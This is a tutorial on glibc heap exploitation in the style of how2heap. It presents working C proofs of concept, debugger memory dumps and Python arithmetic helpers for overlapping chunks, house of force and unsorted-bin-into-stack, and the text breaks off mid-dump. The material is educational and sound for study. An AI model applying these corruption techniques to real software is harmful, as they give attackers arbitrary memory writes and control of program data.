overlapping_chunks
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
int main() {
intptr_t *p1,*p2,*p3,*p4;
p1 = malloc(0x90 - 8);
p2 = malloc(0x90 - 8);
p3 = malloc(0x80 - 8);
memset(p1, 'A', 0x90 - 8);
memset(p2, 'A', 0x90 - 8);
memset(p3, 'A', 0x80 - 8);
fprintf(stderr, "Now we allocate 3 chunks on the heap\n");
fprintf(stderr, "p1=%p\np2=%p\np3=%p\n\n", p1, p2, p3);
free(p2);
fprintf(stderr, "Freeing the chunk p2\n");
int evil_chunk_size = 0x111;
int evil_region_size = 0x110 - 8;
*(p2-1) = evil_chunk_size; // Overwriting the "size" field of chunk p2
fprintf(stderr, "Emulating an overflow that can overwrite the size of the chunk p2.\n\n");
p4 = malloc(evil_region_size);
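fprintf(stderr, "p4: %p ~ %p\n", p4, p4+evil_region_size); // note: p4 is intptr_t*, so the printed end address is scaled by sizeof(intptr_t)
fprintf(stderr, "p3: %p ~ %p\n", p3, p3+0x80); // same scaling applies here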
fprintf(stderr, "\nIf we memset(p4, 'B', 0xd0), we have:\n");
memset(p4, 'B', 0xd0);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);
fprintf(stderr, "\nIf we memset(p3, 'C', 0x50), we have:\n");
memset(p3, 'C', 0x50);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);
}
$ gcc -g overlapping_chunks.c
$ ./a.out
Now we allocate 3 chunks on the heap
p1=0x1e2b010
p2=0x1e2b0a0
p3=0x1e2b130
Freeing the chunk p2
Emulating an overflow that can overwrite the size of the chunk p2.
p4: 0x1e2b0a0 ~ 0x1e2b8e0
p3: 0x1e2b130 ~ 0x1e2b530
If we memset(p4, 'B', 0xd0), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
p3 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
If we memset(p3, 'C', 0x50), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
p3 = CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
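This one is fairly simple: it is a chunk-overlap problem. An overflow vulnerability is used to rewrite the size of a free chunk in the unsorted bin, which changes the size of the chunk that the next malloc can return.
First allocate three chunks, then free the middle one: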
gef➤ x/60gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x4141414141414141
0x602030: 0x4141414141414141 0x4141414141414141
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x0000000000000091 <-- chunk 2 [be freed]
0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x6020b0: 0x4141414141414141 0x4141414141414141
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x0000000000000090 0x0000000000000080 <-- chunk 3
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x4141414141414141
0x602150: 0x4141414141414141 0x4141414141414141
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x0000000000020e61 <-- top chunk
0x6021b0: 0x0000000000000000 0x0000000000000000
0x6021c0: 0x0000000000000000 0x0000000000000000
0x6021d0: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
→ Chunk(addr=0x6020a0, size=0x90, flags=PREV_INUSE)
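Chunk 2 has been placed in the unsorted bin, and its size is 0x90.
Next, assume we have an overflow vulnerability that can rewrite the size of chunk 2. Here we change it to 0x111, that is, the original sizes of chunk 2 and chunk 3 added together (0x90 + 0x80 = 0x110) with the lowest bit set to 1 to indicate that chunk 1 is in use; it does not actually matter whether that bit is set.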
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
→ Chunk(addr=0x6020a0, size=0x110, flags=PREV_INUSE)
The data in the unsorted bin has changed accordingly.
Next, malloc a chunk 4 whose size equals the sum of chunk 2 and chunk 3; it will cover both chunk 2 and chunk 3:
gef➤ x/60gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x4141414141414141
0x602030: 0x4141414141414141 0x4141414141414141
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x0000000000000111 <-- chunk 4
0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x6020b0: 0x4141414141414141 0x4141414141414141
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x0000000000000090 0x0000000000000080 <-- chunk 3
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x4141414141414141
0x602150: 0x4141414141414141 0x4141414141414141
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x0000000000020e61 <-- top chunk
0x6021b0: 0x0000000000000000 0x0000000000000000
0x6021c0: 0x0000000000000000 0x0000000000000000
0x6021d0: 0x0000000000000000 0x0000000000000000
As a result, chunk 4 and chunk 3 overlap, and each chunk can modify the other's data, just as the program output above shows.
overlapping_chunks_2
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
int main() {
intptr_t *p1,*p2,*p3,*p4,*p5,*p6;
unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
int prev_in_use = 0x1;
p1 = malloc(0x10);
p2 = malloc(0x80);
p3 = malloc(0x80);
p4 = malloc(0x80);
p5 = malloc(0x10);
real_size_p1 = malloc_usable_size(p1);
real_size_p2 = malloc_usable_size(p2);
real_size_p3 = malloc_usable_size(p3);
real_size_p4 = malloc_usable_size(p4);
real_size_p5 = malloc_usable_size(p5);
memset(p1, 'A', real_size_p1);
memset(p2, 'A', real_size_p2);
memset(p3, 'A', real_size_p3);
memset(p4, 'A', real_size_p4);
memset(p5, 'A', real_size_p5);
fprintf(stderr, "Now we allocate 5 chunks on the heap\n\n");
fprintf(stderr, "chunk p1: %p ~ %p\n", p1, (unsigned char *)p1+malloc_usable_size(p1));
fprintf(stderr, "chunk p2: %p ~ %p\n", p2, (unsigned char *)p2+malloc_usable_size(p2));
fprintf(stderr, "chunk p3: %p ~ %p\n", p3, (unsigned char *)p3+malloc_usable_size(p3));
fprintf(stderr, "chunk p4: %p ~ %p\n", p4, (unsigned char *)p4+malloc_usable_size(p4));
fprintf(stderr, "chunk p5: %p ~ %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5));
free(p4);
fprintf(stderr, "\nLet's free the chunk p4\n\n");
fprintf(stderr, "Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)\n\n");
*(unsigned int *)((unsigned char *)p1 + real_size_p1) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; // BUG HERE
free(p2);
p6 = malloc(0x1b0 - 0x10);
real_size_p6 = malloc_usable_size(p6);
fprintf(stderr, "Allocating a new chunk 6: %p ~ %p\n\n", p6, (unsigned char *)p6+real_size_p6);
fprintf(stderr, "Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)\n");
fprintf(stderr, "p3 before = %s\n", (char *)p3);
memset(p6, 'B', 0xd0);
fprintf(stderr, "p3 after = %s\n", (char *)p3);
}
$ gcc -g overlapping_chunks_2.c
$ ./a.out
Now we allocate 5 chunks on the heap
chunk p1: 0x18c2010 ~ 0x18c2028
chunk p2: 0x18c2030 ~ 0x18c20b8
chunk p3: 0x18c20c0 ~ 0x18c2148
chunk p4: 0x18c2150 ~ 0x18c21d8
chunk p5: 0x18c21e0 ~ 0x18c21f8
Let's free the chunk p4
Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)
Allocating a new chunk 6: 0x18c2030 ~ 0x18c21d8
Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)
p3 before = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
p3 after = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
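This is again a chunk-overlap problem. In the previous example the size was modified after the chunk had been freed and placed in the unsorted bin, and a differently sized chunk was then obtained from malloc. Here the size is modified before the free, so that free writes a wrong prev_size into a later chunk and the chunk in the middle is forcibly merged. Also, the previous overlap was between adjacent chunks, whereas this one is between non-adjacent chunks.
We need five chunks. Assume chunk 1 has an overflow that can overwrite the data of chunk 2; chunk 5 is there to keep chunk 4 from being merged into the top chunk when it is freed. The region we want to overlap therefore runs from chunk 2 to chunk 4. First free chunk 4, and note the prev_size value of chunk 5: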
gef➤ x/70gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x0000000000000091 <-- chunk 2
0x602030: 0x4141414141414141 0x4141414141414141
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x4141414141414141
0x6020a0: 0x4141414141414141 0x4141414141414141
0x6020b0: 0x4141414141414141 0x0000000000000091 <-- chunk 3
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x4141414141414141 0x4141414141414141
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x0000000000000091 <-- chunk 4 [be freed]
0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x4141414141414141
0x6021b0: 0x4141414141414141 0x4141414141414141
0x6021c0: 0x4141414141414141 0x4141414141414141
0x6021d0: 0x0000000000000090 0x0000000000000020 <-- chunk 5 <-- prev_size
0x6021e0: 0x4141414141414141 0x4141414141414141
0x6021f0: 0x4141414141414141 0x0000000000020e11 <-- top chunk
0x602200: 0x0000000000000000 0x0000000000000000
0x602210: 0x0000000000000000 0x0000000000000000
0x602220: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602140, bk=0x602140
→ Chunk(addr=0x602150, size=0x90, flags=PREV_INUSE)
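The freed chunk 4 is placed in the unsorted bin with a size of 0x90.
Next comes the most critical step: use the overflow in chunk 1 to change the size of chunk 2 to the combined size of chunk 2 and chunk 3, that is, 0x90+0x90+0x1=0x121, where the final 1 is the flag bit. When we then free chunk 2, free relies on the modified size and believes that the whole region of chunk 2 plus chunk 3 is being released. It finds that the chunk right after that region, chunk 4, is also free, merges the two into one large free chunk, puts it into the unsorted bin, and in doing so writes a wrong prev_size into chunk 5.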
gef➤ x/70gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x00000000000001b1 <-- chunk 2 [be freed] <-- unsorted bin
0x602030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x4141414141414141
0x6020a0: 0x4141414141414141 0x4141414141414141
0x6020b0: 0x4141414141414141 0x0000000000000091 <-- chunk 3
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x4141414141414141 0x4141414141414141
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x0000000000000091 <-- chunk 4 [be freed]
0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x4141414141414141
0x6021b0: 0x4141414141414141 0x4141414141414141
0x6021c0: 0x4141414141414141 0x4141414141414141
0x6021d0: 0x00000000000001b0 0x0000000000000020 <-- chunk 5 <-- prev_size
0x6021e0: 0x4141414141414141 0x4141414141414141
0x6021f0: 0x4141414141414141 0x0000000000020e11 <-- top chunk
0x602200: 0x0000000000000000 0x0000000000000000
0x602210: 0x0000000000000000 0x0000000000000000
0x602220: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602020, bk=0x602020
→ Chunk(addr=0x602030, size=0x1b0, flags=PREV_INUSE)
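The chunk in the unsorted bin now has size 0x1b0, that is, 0x90*3. So although chunk 3 is still in use, it has been forcibly counted as part of the free chunk.
Finally, if we request a large block of size 0x1b0-0x10, the returned chunk spans chunk 2 + chunk 3 + chunk 4. Chunk 6 and chunk 3 now overlap, which is exactly what the program printed above.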
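The size arithmetic used in this walkthrough can be checked with a few lines of Python. This is only a sketch: the helper names forged_size and request_for are hypothetical, and it assumes a 64-bit glibc where the chunk header is 0x10 bytes.

```python
SIZE_SZ = 8          # assumption: 64-bit glibc, 8-byte size fields
PREV_INUSE = 0x1     # lowest bit of the size field

def forged_size(*chunk_sizes):
    """Size field that makes one chunk appear to span several neighbours."""
    return sum(chunk_sizes) | PREV_INUSE

def request_for(chunk_size):
    """A request size that malloc rounds up to exactly chunk_size."""
    return chunk_size - 2 * SIZE_SZ

chunk2 = chunk3 = chunk4 = 0x90
overwrite = forged_size(chunk2, chunk3)     # value written over chunk 2's size
merged = chunk2 + chunk3 + chunk4           # size seen in the unsorted bin
print(hex(overwrite), hex(merged), hex(request_for(merged)))
```

The three printed values correspond to the forged size field, the size of the merged free chunk, and the request that returns the overlapping chunk.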
3.1.8 Linux Heap Exploitation (Part 3)
- how2heap
- References
how2heap
house_of_force
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
char bss_var[] = "This is a string that we want to overwrite.";
int main() {
fprintf(stderr, "We will overwrite a variable at %p\n\n", bss_var);
intptr_t *p1 = malloc(0x10);
int real_size = malloc_usable_size(p1);
memset(p1, 'A', real_size);
fprintf(stderr, "Let's allocate the first chunk of 0x10 bytes: %p.\n", p1);
fprintf(stderr, "Real size of our allocated chunk is 0x%x.\n\n", real_size);
intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size);
fprintf(stderr, "Overwriting the top chunk size with a big value so the malloc will never call mmap.\n");
fprintf(stderr, "Old size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
ptr_top[0] = -1;
fprintf(stderr, "New size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*2 - (unsigned long)ptr_top;
fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size, we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
void *new_ptr = malloc(evil_size);
int real_size_new = malloc_usable_size(new_ptr);
memset((char *)new_ptr + real_size_new - 0x20, 'A', 0x20);
fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr);
void* ctr_chunk = malloc(0x30);
fprintf(stderr, "malloc(0x30) => %p!\n", ctr_chunk);
fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.\n");
fprintf(stderr, "old string: %s\n", bss_var);
strcpy(ctr_chunk, "YEAH!!!");
fprintf(stderr, "new string: %s\n", bss_var);
}
$ gcc -g house_of_force.c
$ ./a.out
We will overwrite a variable at 0x601080
Let's allocate the first chunk of 0x10 bytes: 0x824010.
Real size of our allocated chunk is 0x18.
Overwriting the top chunk size with a big value so the malloc will never call mmap.
Old size of top chunk: 0x20fe1
New size of top chunk: 0xffffffffffffffff
The value we want to write to at 0x601080, and the top chunk is at 0x824028, so accounting for the header size, we will malloc 0xffffffffffddd048 bytes.
As expected, the new pointer is at the same place as the old top chunk: 0x824030
malloc(0x30) => 0x601080!
Now, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.
old string: This is a string that we want to overwrite.
new string: YEAH!!!
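house_of_force is a technique that tricks malloc into returning an arbitrary address by overwriting the size field of the top chunk. At the highest address of the free heap memory there is always one free chunk, the top chunk. When neither the bins nor the fast bins can satisfy a request, malloc carves a piece off the top chunk and returns it to the user, so the size of the top chunk keeps changing as memory is allocated and released. The attack assumes an overflow that can overwrite the top chunk header and set its size to a very large value, which ensures that every malloc is served from the top chunk and never falls back to mmap. If the attacker then requests a very large size (a negative number when read as a signed integer), adding it to the top chunk address wraps around, and the top chunk is moved to an address below the heap (for example the program's .bss or .data section, or the GOT). The next malloc then gives the attacker control over the memory at the relocated address.
First allocate an arbitrary chunk. Memory now holds two chunks, chunk 1 and the top chunk: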
gef➤ x/8gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x0000000000020fe1 <-- top chunk
0x602030: 0x0000000000000000 0x0000000000000000
chunk 1 has 0x18 bytes of actually usable memory.
Assume chunk 1 can be overflowed. Using that bug, we change the size of the top chunk to a very large value:
gef➤ x/8gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0xffffffffffffffff <-- modified top chunk
0x602030: 0x0000000000000000 0x0000000000000000
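After the overwrite, size == 0xffffffffffffffff.
We can now malloc a region of arbitrary size without triggering mmap. Next, malloc a chunk that ends right before the region we want to control, so that the following malloc returns that region. The request size is the target address minus the address of the top chunk, minus the size of the chunk header.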
gef➤ x/8gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0xfffffffffffff051
0x602030: 0x0000000000000000 0x0000000000000000
gef➤ x/12gx 0x602010+0xfffffffffffff050
0x601060: 0x4141414141414141 0x4141414141414141
0x601070: 0x4141414141414141 0x0000000000000fa9 <-- top chunk
0x601080 <bss_var>: 0x2073692073696854 0x676e697274732061 <-- target
0x601090 <bss_var+16>: 0x6577207461687420 0x6f7420746e617720
0x6010a0 <bss_var+32>: 0x6972777265766f20 0x00000000002e6574
0x6010b0: 0x0000000000000000 0x0000000000000000
malloc once more so that the target address is included, and we now control the target memory:
gef➤ x/12gx 0x602010+0xfffffffffffff050
0x601060: 0x4141414141414141 0x4141414141414141
0x601070: 0x4141414141414141 0x0000000000000041 <-- chunk 2
0x601080 <bss_var>: 0x2073692073696854 0x676e697274732061 <-- target
0x601090 <bss_var+16>: 0x6577207461687420 0x6f7420746e617720
0x6010a0 <bss_var+32>: 0x6972777265766f20 0x00000000002e6574
0x6010b0: 0x0000000000000000 0x0000000000000f69 <-- top chunk
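The drawback of this technique is that it is affected by ASLR. To modify memory at a chosen location, the attacker must first know the current position of the top chunk in order to compute the malloc size that relocates it. Since ASLR randomizes heap addresses, the technique has to be combined with an information leak.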
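The request size and the resulting wrap-around can be reproduced in Python with the addresses from the program output above. This is a sketch under stated assumptions: 64-bit arithmetic, a simplified request2size without the MINSIZE clamp, and hypothetical helper names (evil_size, top_after_malloc).

```python
MASK = (1 << 64) - 1            # emulate 64-bit unsigned wrap-around
SIZE_SZ = 8
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1

def request2size(req):
    """Simplified request2size: add the size word, round up to 16 bytes."""
    return ((req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) & MASK

def evil_size(target, top_size_field):
    """Same formula as the C listing: target - 2*sizeof(long) - ptr_top."""
    return (target - 2 * SIZE_SZ - top_size_field) & MASK

def top_after_malloc(top_chunk, req):
    """Address of the top chunk after serving req from it."""
    return (top_chunk + request2size(req)) & MASK

target = 0x601080                # bss_var in the run above
top_size_field = 0x824028        # ptr_top in the run above
top_chunk = top_size_field - SIZE_SZ

req = evil_size(target, top_size_field)
new_top = top_after_malloc(top_chunk, req)
next_ptr = new_top + 2 * SIZE_SZ  # user pointer returned by the next malloc
print(hex(req), hex(new_top), hex(next_ptr))
```

With these inputs the request matches the 0xffffffffffddd048 printed by the program, and the next user pointer lands on bss_var.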
unsorted_bin_into_stack
#include <stdio.h>
#include <stdlib.h>
int main() {
unsigned long stack_buf[4] = {0};
unsigned long *victim = malloc(0x80);
unsigned long *p1 = malloc(0x10);
fprintf(stderr, "Allocating the victim chunk at %p\n", victim);
// deal with tcache
// int *k[10], i;
// for (i = 0; i < 7; i++) {
// k[i] = malloc(0x80);
// }
// for (i = 0; i < 7; i++) {
// free(k[i]);
// }
free(victim);
fprintf(stderr, "Freeing the chunk, it will be inserted in the unsorted bin\n\n");
stack_buf[1] = 0x100 + 0x10;
stack_buf[3] = (unsigned long)stack_buf; // or any other writable address
fprintf(stderr, "Create a fake chunk on the stack\n");
fprintf(stderr, "fake->size: %p\n", (void *)stack_buf[1]);
fprintf(stderr, "fake->bk: %p\n\n", (void *)stack_buf[3]);
victim[1] = (unsigned long)stack_buf;
fprintf(stderr, "Now we overwrite the victim->bk pointer to stack: %p\n\n", stack_buf);
fprintf(stderr, "Malloc a chunk which size is 0x110 will return the region of our fake chunk: %p\n", &stack_buf[2]);
unsigned long *fake = malloc(0x100);
fprintf(stderr, "malloc(0x100): %p\n", fake);
}
$ gcc -g unsorted_bin_into_stack.c
$ ./a.out
Allocating the victim chunk at 0x17a1010
Freeing the chunk, it will be inserted in the unsorted bin
Create a fake chunk on the stack
fake->size: 0x110
fake->bk: 0x7fffcd906480
Now we overwrite the victim->bk pointer to stack: 0x7fffcd906480
Malloc a chunk which size is 0x110 will return the region of our fake chunk: 0x7fffcd906490
malloc(0x100): 0x7fffcd906490
unsorted-bin-into-stack overwrites the bk pointer of a chunk in the unsorted bin with an arbitrary address, so that malloc returns a chunk on the stack.
First put a chunk into the unsorted bin and forge a chunk on the stack:
gdb-peda$ x/6gx victim - 2
0x602000: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x602010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x602020: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdbc0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdbd0: 0x0000000000000000 0x00007fffffffdbc0
Then assume a bug lets us overwrite the bk pointer of the victim chunk, and point it at the fake chunk:
gdb-peda$ x/6gx victim - 2
0x602000: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x602010: 0x00007ffff7dd1b78 0x00007fffffffdbc0 <-- bk pointer
0x602020: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdbc0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdbd0: 0x0000000000000000 0x00007fffffffdbc0
At this point the fake chunk is effectively linked into the unsorted bin. On the next malloc, malloc walks the list along the bk pointers and finds the fake chunk, whose size is an exact fit:
gdb-peda$ x/6gx victim - 2
0x602000: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x602010: 0x00007ffff7dd1bf8 0x00007ffff7dd1bf8
0x602020: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx fake - 2
0x7fffffffdbc0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdbd0: 0x00007ffff7dd1b78 0x00007fffffffdbc0
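The fake chunk is returned, while the victim chunk is removed from the unsorted bin and placed in a small bin. Note also that the fd pointer of the fake chunk has been modified: it now holds the address of the unsorted bin, which can be used to leak a libc address. This is exactly what the unsorted bin attack below covers.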
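The walk along the bk pointers can be modeled with a small Python simulation. It is a heavily simplified sketch of the unsorted bin loop in _int_malloc (no size sanity checks, no last_remainder handling), and the dictionary layout and the name walk_unsorted are hypothetical. The addresses are taken from the gdb dumps above.

```python
HEAD = 0x7ffff7dd1b78      # unsorted bin head seen in the dumps
VICTIM = 0x602000          # freed victim chunk
FAKE = 0x7fffffffdbc0      # fake chunk on the stack (stack_buf)

mem = {
    HEAD:   {"size": 0,     "fd": VICTIM, "bk": VICTIM},
    VICTIM: {"size": 0x91,  "fd": HEAD,   "bk": FAKE},   # bk overwritten
    FAKE:   {"size": 0x110, "fd": 0,      "bk": FAKE},
}

def walk_unsorted(mem, head, nb):
    """Follow bk from the bin head and return the first exact fit."""
    moved = []                              # chunks sorted into regular bins
    victim = mem[head]["bk"]
    while victim != head:
        bck = mem[victim]["bk"]
        size = mem[victim]["size"] & ~0x7
        mem[head]["bk"] = bck               # unsorted_chunks(av)->bk = bck
        mem[bck]["fd"] = head               # bck->fd = unsorted_chunks(av)
        if size == nb:
            return victim + 0x10, moved     # user pointer of the exact fit
        moved.append(victim)
        victim = mem[head]["bk"]
    return None, moved

ptr, moved = walk_unsorted(mem, HEAD, 0x110)   # malloc(0x100) needs 0x110
print(hex(ptr), [hex(c) for c in moved], hex(mem[FAKE]["fd"]))
```

The model returns the address of stack_buf[2], reports the victim as moved out of the unsorted bin, and leaves the bin head address in the fd field of the fake chunk, as in the last dump.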
Uncommenting the code above gives the version for libc-2.27. Note, however, that because of tcache, stack_buf[3] can no longer be set to an arbitrary address.
Before malloc:
gdb-peda$ x/6gx victim - 2
0x555555756250: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x555555756260: 0x00007ffff7dd2b00 0x00007fffffffdcb0
0x555555756270: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdcc0: 0x0000000000000000 0x00007fffffffdcb0
gdb-peda$ x/26gx 0x0000555555756000+0x10
0x555555756010: 0x0700000000000000 0x0000000000000000 <-- counts
0x555555756020: 0x0000000000000000 0x0000000000000000
0x555555756030: 0x0000000000000000 0x0000000000000000
0x555555756040: 0x0000000000000000 0x0000000000000000
